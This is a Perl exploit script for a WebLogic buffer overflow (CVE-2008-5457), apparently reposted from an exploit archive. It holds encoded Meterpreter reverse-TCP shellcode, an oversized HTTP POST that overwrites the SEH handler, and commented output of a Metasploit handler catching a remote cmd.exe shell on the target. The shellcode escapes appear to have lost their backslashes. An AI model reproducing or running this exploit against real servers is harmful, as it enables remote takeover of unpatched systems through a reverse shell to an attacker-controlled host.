Home / os / win10

weblogic-overflow.txt

Posted on 01 April 2009

#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
# [*] Sending stage (75776 bytes)
# [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171)
#
# meterpreter > rev2self
# meterpreter > execute -i -f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# c:windowssystem32inetsrv>



# LHOST=10.10.10.1 LPORT=80
# windows/reflectivemeterpreter/reverse_tcp
# [*] x86/alpha_mixed succeeded, final size 619
my $shellcode =
"xd9xecxd9x74x24xf4x5bx53x59x49x49x49x49x49" .
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x4bx4cx4bx58x46x36x45x50x45x50x43" .
"x30x50x53x46x35x51x46x51x47x4cx4bx42x4cx47" .
"x54x44x58x4cx4bx50x45x47x4cx4cx4bx51x44x43" .
"x35x44x38x45x51x4bx5ax4cx4bx50x4ax45x48x4c" .
"x4bx51x4ax47x50x43x31x4ax4bx4bx53x50x32x51" .
"x59x4cx4bx47x44x4cx4bx45x51x4ax4ex50x31x4b" .
"x4fx4bx4cx50x31x49x50x4ex4cx47x48x4dx30x43" .
"x44x44x47x49x51x48x4fx44x4dx43x31x49x57x4a" .
"x4bx4bx42x47x4bx43x4cx47x54x42x34x44x35x4b" .
"x51x4cx4bx51x4ax47x54x45x51x4ax4bx43x56x4c" .
"x4bx44x4cx50x4bx4cx4bx51x4ax45x4cx45x51x4a" .
"x4bx4cx4bx43x34x4cx4bx45x51x4ax48x4ax4bx43" .
"x32x50x31x49x50x51x4fx51x4ex51x4dx51x4bx48" .
"x42x45x58x43x30x51x4ex42x4ax46x50x51x49x43" .
"x54x4cx4bx42x39x4cx4bx51x4bx44x4cx4cx4bx51" .
"x4bx45x4cx4cx4bx45x4bx4cx4bx51x4bx44x48x51" .
"x43x45x38x4cx4ex50x4ex44x4ex4ax4cx4bx4fx4e" .
"x36x4dx59x48x47x46x33x45x38x46x34x48x4ax4e" .
"x4fx4cx51x4bx4fx49x46x4dx51x4ax4cx45x50x43" .
"x31x43x30x45x50x50x50x46x37x46x36x51x43x4d" .
"x59x4dx35x4dx38x45x4fx43x30x45x50x43x30x4a" .
"x30x43x31x43x30x45x50x48x36x45x49x42x38x4d" .
"x37x49x34x42x39x42x50x4dx39x4ax4cx4cx39x4e" .
"x4ax43x50x48x59x45x59x4ax55x4ex4dx48x4bx4a" .
"x4dx4bx4cx47x4bx51x47x50x53x46x52x51x4fx46" .
"x53x46x52x45x50x51x4bx4cx4dx50x4bx42x38x46" .
"x31x4bx4fx48x57x4bx39x49x4fx4bx39x48x43x4c" .
"x4dx44x35x44x54x43x5ax45x55x50x59x46x31x46" .
"x33x4bx4fx46x54x4cx4fx4bx4fx50x55x44x44x51" .
"x49x4cx49x44x44x4cx4ex4bx52x4bx42x46x4bx47" .
"x57x50x54x4bx4fx50x37x4bx4fx46x35x51x38x46" .
"x51x49x50x50x50x46x30x46x30x46x30x47x30x46" .
"x30x47x30x50x50x4bx4fx51x45x51x34x4bx39x48" .
"x47x45x38x44x4ax45x5ax44x4ax45x51x43x58x44" .
"x42x45x50x45x50x46x30x4bx39x4dx31x43x5ax42" .
"x30x46x31x51x47x4bx4fx50x55x51x30x43x5ax51" .
"x50x51x4ex46x36x49x51x4ax46x45x56x51x46x49" .
"x51x4ax46x44x48x46x36x43x5ax45x50x4bx4fx46" .
"x35x44x4cx4dx59x49x53x42x4ax43x30x50x56x51" .
"x43x50x57x4bx4fx46x35x44x58x4bx4fx48x53x44" .
"x4ax41x41";


use warnings;
use strict;
use IO::Socket::INET;

my $sock = IO::Socket::INET->new(PeerAddr => '10.10.10.4', PeerPort => '80', Proto => 'tcp');

print $sock	"POST /index.jsp?;JSESSIONID=" .
"B" x 5132 .
$shellcode .
"C" x (3000-length($shellcode)) .
"xe9x43xf4xffxff" .	# jmp back
"x90x90xebxf7" .		# jmp back
"x76x79" .			# SEH partial rewrite
" HTTP/1.0
" .
"Connection:Keep-Alive
" .
"Content-Length: 81

" . "A" x 81 . "
";

 

TOP